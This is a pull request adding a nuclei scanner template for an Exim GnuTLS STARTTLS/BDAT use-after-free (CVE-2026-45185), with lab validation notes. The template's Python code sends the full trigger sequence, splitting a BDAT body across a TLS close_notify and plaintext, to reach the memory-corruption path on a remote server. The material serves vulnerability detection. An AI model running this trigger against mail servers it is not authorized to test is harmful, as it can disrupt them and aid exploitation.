### PR TITLE
Add CVE-2026-45185 template for Exim STARTTLS BDAT response check

### DIFF
--- a/code/cves/2026/CVE-2026-45185.yaml
+++ b/code/cves/2026/CVE-2026-45185.yaml
@@ -1,0 +1,329 @@
+id: CVE-2026-45185
+
+info:
+  name: Exim 4.97-4.99.2 GnuTLS STARTTLS BDAT - Same-Session Response Check
+  author: MJ-bin
+  severity: critical
+  description: |
+    Exim 4.97 through 4.99.2 with GnuTLS can mishandle STARTTLS receive state
+    when a BDAT body is split across TLS close_notify and plaintext on the same
+    SMTP connection. This authorized code template sends that split sequence and
+    checks for a vulnerable-like same-session response pattern. An accepted
+    recipient must be provided with -var recipient=<mailbox> to reach BDAT body
+    parsing.
+  impact: |
+    Affected GnuTLS-enabled Exim configurations may expose a remotely reachable
+    use-after-free condition in STARTTLS and BDAT receive handling.
+  remediation: |
+    Upgrade Exim to 4.99.3 or later, or apply the vendor/distribution patch for
+    CVE-2026-45185.
+  reference:
+    - https://xbow.com/blog/dead-letter-cve-2026-45185-xbow-found-rce-exim
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-45185
+    - https://www.openwall.com/lists/oss-security/2026/05/12/4
+    - https://code.exim.org/exim/exim/commit/040c1ce6889f435206677ed532c9a4185cf0bcaf
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-45185
+    cwe-id: CWE-416
+    epss-score: 0.0006
+    epss-percentile: 0.183
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: exim
+    product: exim
+    shodan-query: "product:\"Exim smtpd\""
+  tags: cve,cve2026,exim,smtp,mail,starttls,bdat,gnutls,code,intrusive
+
+variables:
+  sender: "sender@example.com"
+  recipient: "{{recipient}}" # accepted RCPT TO address required for BDAT reachability.
+  helo: "nuclei.local"
+  timeout: "5"
+
+code:
+  - engine:
+      - py
+      - python3
+
+    source: |
+      import os
+      import socket
+      import ssl
+      import sys
+      import time
+
+      MARKER = "CVE-2026-45185: vulnerable response oracle matched"
+      # RFC5322-like message header text. This To: value is not the SMTP RCPT TO
+      # envelope recipient and does not need to be accepted by the server.
+      BODY = (
+          b"From: sender@example.com\r\n"
+          b"To: victim@example.com\r\n"
+          b"Subject: poc\r\n"
+          b"\r\n"
+          b"body"
+      )
+
+      def getenv(name, default=None):
+          value = os.getenv(name)
+          return value if value not in (None, "") else default
+
+      def as_bytes(value):
+          return value.encode("ascii", errors="strict")
+
+      def smtp_response_complete(data):
+          lines = data.splitlines()
+          if not lines:
+              return False
+          first = lines[0]
+          if len(first) < 4 or not first[:3].isdigit():
+              return False
+          code = first[:3]
+          for line in lines:
+              # SMTP multiline replies end when the status code is followed by a space.
+              if line.startswith(code + b" "):
+                  return True
+          return False
+
+      def recv_until_response(sock, timeout):
+          sock.settimeout(timeout)
+          chunks = []
+          deadline = time.monotonic() + timeout
+          while time.monotonic() < deadline:
+              try:
+                  data = sock.recv(4096)
+              except socket.timeout:
+                  break
+              if not data:
+                  break
+              chunks.append(data)
+              joined = b"".join(chunks)
+              if smtp_response_complete(joined):
+                  return joined
+          return b"".join(chunks)
+
+      def positive_smtp(response, prefix=b"2"):
+          return len(response) >= 3 and response[:1] == prefix and response[:3].isdigit()
+
+      class ManualTLS:
+          def __init__(self, raw, host, timeout):
+              self.raw = raw
+              self.host = host
+              self.timeout = timeout
+              self.incoming = ssl.MemoryBIO()
+              self.outgoing = ssl.MemoryBIO()
+              context = ssl.create_default_context()
+              context.check_hostname = False
+              context.verify_mode = ssl.CERT_NONE
+              self.tls = context.wrap_bio(
+                  self.incoming,
+                  self.outgoing,
+                  server_side=False,
+                  server_hostname=host,
+              )
+
+          def flush(self):
+              while self.outgoing.pending:
+                  self.raw.sendall(self.outgoing.read())
+
+          def feed(self):
+              self.raw.settimeout(self.timeout)
+              data = self.raw.recv(4096)
+              if not data:
+                  raise EOFError("socket closed while waiting for TLS data")
+              self.incoming.write(data)
+
+          def handshake(self):
+              while True:
+                  try:
+                      self.tls.do_handshake()
+                      self.flush()
+                      return
+                  except ssl.SSLWantReadError:
+                      self.flush()
+                      self.feed()
+                  except ssl.SSLWantWriteError:
+                      self.flush()
+
+          def send(self, data):
+              view = memoryview(data)
+              while view:
+                  try:
+                      sent = self.tls.write(view)
+                      view = view[sent:]
+                      self.flush()
+                  except ssl.SSLWantReadError:
+                      self.flush()
+                      self.feed()
+                  except ssl.SSLWantWriteError:
+                      self.flush()
+              self.flush()
+
+          def send_line(self, line):
+              self.send(line + b"\r\n")
+
+          def recv_response(self):
+              chunks = []
+              deadline = time.monotonic() + self.timeout
+              while time.monotonic() < deadline:
+                  try:
+                      data = self.tls.read(4096)
+                      if not data:
+                          break
+                      chunks.append(data)
+                      joined = b"".join(chunks)
+                      if smtp_response_complete(joined):
+                          return joined
+                  except ssl.SSLWantReadError:
+                      self.flush()
+                      remaining = max(0.0, deadline - time.monotonic())
+                      if remaining == 0:
+                          break
+                      self.raw.settimeout(remaining)
+                      try:
+                          encrypted = self.raw.recv(4096)
+                      except socket.timeout:
+                          break
+                      if not encrypted:
+                          break
+                      self.incoming.write(encrypted)
+                  except ssl.SSLWantWriteError:
+                      self.flush()
+                  except ssl.SSLError as exc:
+                      return b"[ssl-error: " + str(exc).encode() + b"]"
+              return b"".join(chunks)
+
+          def close_notify_only(self):
+              while True:
+                  try:
+                      self.tls.unwrap()
+                      self.flush()
+                      return
+                  except ssl.SSLWantWriteError:
+                      self.flush()
+                  except ssl.SSLWantReadError:
+                      self.flush()
+                      return
+
+      def connect_smtp(host, port, timeout):
+          raw = socket.create_connection((host, port), timeout=timeout)
+          banner = recv_until_response(raw, timeout)
+          return raw, banner
+
+      def starttls_session(host, port, timeout, helo, sender, recipient):
+          raw, banner = connect_smtp(host, port, timeout)
+          raw.sendall(b"EHLO " + helo + b"\r\n")
+          ehlo_plain = recv_until_response(raw, timeout)
+
+          if b"Exim" not in banner + ehlo_plain:
+              raw.close()
+              return None, None, "preflight failed: Exim identity not found"
+          if b"STARTTLS" not in ehlo_plain:
+              raw.close()
+              return None, None, "preflight failed: STARTTLS not advertised"
+          if b"CHUNKING" not in ehlo_plain:
+              raw.close()
+              return None, None, "preflight failed: CHUNKING not advertised"
+
+          raw.sendall(b"STARTTLS\r\n")
+          starttls = recv_until_response(raw, timeout)
+          if not starttls.startswith(b"220"):
+              raw.close()
+              return None, None, "preflight failed: STARTTLS was not accepted"
+
+          # Use MemoryBIO so close_notify can be sent without closing the TCP socket.
+          tls = ManualTLS(raw, host, timeout)
+          tls.handshake()
+
+          tls.send_line(b"EHLO " + helo)
+          ehlo_tls = tls.recv_response()
+          if b"CHUNKING" not in ehlo_tls:
+              raw.close()
+              return None, None, "TLS EHLO failed: CHUNKING not advertised"
+
+          tls.send_line(b"MAIL FROM:<" + sender + b">")
+          sndr = tls.recv_response()
+          if not positive_smtp(sndr):
+              raw.close()
+              return None, None, "BDAT reachability not reached: MAIL FROM rejected"
+
+          tls.send_line(b"RCPT TO:<" + recipient + b">")
+          rcpt = tls.recv_response()
+          if not positive_smtp(rcpt):
+              raw.close()
+              return None, None, "BDAT reachability not reached: RCPT TO rejected"
+
+          return raw, tls, None
+
+      def close_notify_oracle(host, port, timeout, helo, sender, recipient):
+          raw, tls, error = starttls_session(host, port, timeout, helo, sender, recipient)
+          if error:
+              return False, error
+          try:
+              # Split BDAT across TLS close_notify and same-socket plaintext.
+              tls.send_line(b"BDAT " + str(len(BODY)).encode() + b" LAST")
+              tls.send(BODY[:-1])
+              tls.close_notify_only()
+              raw.sendall(BODY[-1:])
+              completion = recv_until_response(raw, timeout)
+
+              if b"250 OK id=" not in completion:
+                  return False, "split trigger did not reach BDAT completion"
+
+              # The split trigger reached BDAT completion; test same-session plaintext follow-up.
+              raw.sendall(b"NOOP\r\n")
+              followup = recv_until_response(raw, timeout)
+
+              # The oracle is a 421 response to the same-session plaintext follow-up.
+              if b"421" in followup and b"lost input connection" in followup:
+                  return True, "split trigger follow-up returned 421 lost input connection"
+
+              # Patched-like sessions accept NOOP after the split sequence.
+              if followup.startswith(b"250"):
+                  try:
+                      raw.sendall(b"QUIT\r\n")
+                      recv_until_response(raw, timeout)
+                  except OSError:
+                      pass
+                  return False, "patched-like response: NOOP succeeded after split trigger"
+
+              return False, "inconclusive split trigger follow-up response"
+          finally:
+              raw.close()
+
+      def main():
+          try:
+              host = getenv("Host")
+              port = int(getenv("Port", "25"))
+              timeout = float(getenv("timeout", "5"))
+              helo = as_bytes(getenv("helo", "nuclei.local"))
+              sender = as_bytes(getenv("sender", "sender@example.com"))
+              recipient_value = getenv("recipient")
+              if recipient_value in (None, "", "{{recipient}}"):
+                  print("NO-MATCH: recipient variable is required for BDAT reachability")
+                  return 0
+              recipient = as_bytes(recipient_value)
+
+              oracle_ok, oracle_reason = close_notify_oracle(
+                  host, port, timeout, helo, sender, recipient
+              )
+              if oracle_ok:
+                  print(MARKER)
+                  return 0
+
+              print("NO-MATCH:", oracle_reason)
+              return 0
+          except Exception as exc:
+              print("NO-MATCH: error while running response oracle:", exc)
+              return 0
+
+      if __name__ == "__main__":
+          sys.exit(main())
+
+    matchers:
+      - type: word
+        part: response
+        words:
+          - "CVE-2026-45185: vulnerable response oracle matched"


### PR DESCRIPTION
Adds a nuclei `code` template for CVE-2026-45185, an Exim GnuTLS STARTTLS + BDAT receive-state issue.

The template performs an authorized SMTP response check. 
It confirms Exim, `STARTTLS`, and `CHUNKING`, then uses Python `socket` + `ssl.MemoryBIO` to control the same TCP connection across:

```text
plaintext EHLO
-> STARTTLS
-> TLS handshake on the same TCP connection
-> TLS EHLO / MAIL FROM / RCPT TO / BDAT
-> BDAT body bytes over TLS
-> TLS close_notify without closing the TCP socket
-> final BDAT byte as plaintext on the same TCP connection
-> same-session plaintext NOOP response check
```

It matches only when the split BDAT message reaches completion and the same-session follow-up command returns the vulnerable-like `421 ... lost input connection` response.

### PR Information

- Added CVE-2026-45185 template for Exim GnuTLS STARTTLS + BDAT same-session response behavior.
- Template path: `code/cves/2026/CVE-2026-45185.yaml`
- Protocol: `code`
- Requires: `-code`
- Requires an accepted SMTP recipient via `-var recipient=<mailbox>` so the check can reach BDAT body parsing.
- Tagged as `intrusive` because it sends SMTP mail transaction commands and a STARTTLS/BDAT split-close-notify sequence.
- References:
  - https://xbow.com/blog/dead-letter-cve-2026-45185-xbow-found-rce-exim
  - https://exim.org/static/doc/security/EXIM-Security-2026-05-01.1/EXIM-Security-2026-05-01.1.txt
  - https://nvd.nist.gov/vuln/detail/CVE-2026-45185
  - https://www.openwall.com/lists/oss-security/2026/05/12/4
  - https://code.exim.org/exim/exim/commit/040c1ce6889f435206677ed532c9a4185cf0bcaf

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against a local Docker reproduction lab:

- [POC repo URL](https://github.com/MJ-bin/POC_CVE-2026-45185)

Local validation targets:

- Vulnerable target: Exim 4.99.2 debug build, GnuTLS enabled, `127.0.0.1:2525`
- Patched target: Exim 4.99.3 debug build, GnuTLS enabled, `127.0.0.1:2526`

Template validation:
```bash
nuclei -duc -validate -t code/cves/2026/CVE-2026-45185.yaml

[INF] All templates validated successfully
```

True-positive validation:
```bash
nuclei -duc -code \
-t code/cves/2026/CVE-2026-45185.yaml \
-u 127.0.0.1:2525 \
-var recipient=victim@lab.local
```

Expected vulnerable-lab result:
```bash
[CVE-2026-45185] [code] [critical] 127.0.0.1:2525
```

False-positive validation against patched Exim 4.99.3:
```bash
nuclei -duc -code \
-t code/cves/2026/CVE-2026-45185.yaml \
-u 127.0.0.1:2526 \
-var recipient=victim@lab.local
```

Expected patched-lab result:
```bash
[INF] Scan completed ... 0 matches found.
```

Manual response comparison from the local lab:
* Vulnerable Exim 4.99.2:
  ```bash
  split BDAT completion: 250 OK id=...
  same-session NOOP:     421 exim-lab.local lost input connection
  ```

* Patched Exim 4.99.3:
  ```bash
  split BDAT completion: 250 OK id=...
  same-session NOOP:     250 OK
  QUIT:                  221 exim-lab.local closing connection
  ```

The matcher is not version-only and does not match on timeout or empty response alone. The Python code emits a fixed match
marker only after Exim identity, STARTTLS, CHUNKING, accepted SMTP envelope reachability, split BDAT completion, and the
vulnerable-like same-session `421 lost input connection` response are observed.

This is a remote SMTP response oracle for the CVE trigger sequence, not an RCE proof. GnuTLS backend detection and distro backports can still affect real-world interpretation, and the template requires an accepted recipient to avoid false assumptions about BDAT reachability.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)